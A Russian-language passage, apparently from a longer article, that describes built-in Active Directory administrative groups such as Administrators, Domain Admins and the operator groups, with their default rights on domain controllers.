3) Администраторы (Administrators) – находится в контейнере Builtin каждого домена. Эта группа имеет полный доступ ко всем контроллерам домена и данным в контексте именования домена. Она может изменять членство во всех административных группах домена, а группа Администраторы (Administrators) в корневом домене леса может изменять членство в группах Администраторы предприятия (Enterprise Admins), Администраторы Схемы (Schema Admins) и Администраторы домена (Domain Admins). Группа Администраторы в корневом домене леса имеет наибольшие полномочия среди групп администрирования в лесу.

4) Администраторы домена (Domain Admins) – находится в контейнере Users каждого домена. Эта группа входит в группу Администраторы своего домена. Поэтому она наследует все полномочия группы Администраторы. Кроме того, она по умолчанию входит в локальную группу Администраторы каждого рядового компьютера домена, в результате чего администраторы домена получают в свое распоряжение все компьютеры домена.

5) Операторы сервера (Server Operators) – находится в контейнере Builtin каждого домена. Эта группа может решать задачи технической поддержки на контроллерах домена. Операторы сервера могут локально входить в систему, запускать и останавливать службы, выполнять резервное копирование и восстановление, форматировать диски, создавать и удалять общие ресурсы, а также завершать работу контроллеров доменов. По умолчанию данная группа не содержит членов.

6) Операторы учета (Account Operators) – находится в контейнере Builtin каждого домена. Эта группа может создавать, модифицировать и удалять учетные записи пользователей, групп и компьютеров в любом подразделении домена (кроме подразделения Domain Controllers), а также в контейнерах Users и Computers. Операторы учета не могут модифицировать учетные записи, включенные в группы Администраторы и Администраторы домена, а также не могут модифицировать эти группы. Операторы учета также могут локально входить на контроллеры домена. По умолчанию эта группа не содержит членов.

7) Операторы архива (Backup Operators) – находится в контейнере Builtin каждого домена. Эта группа может выполнять операции резервного копирования и восстановления на контроллерах домена, а также локально входить на контроллеры домена и завершать их работу. По умолчанию эта группа не содержит членов.

8 ) Операторы печати (Print Operators) – находится в контейнере Builtin каждого домена. Эта группа может обеспечивать поддержку очередей заданий печати на контроллерах домена. Она также может локально входить на контроллеры домена и завершать их работу.

Источник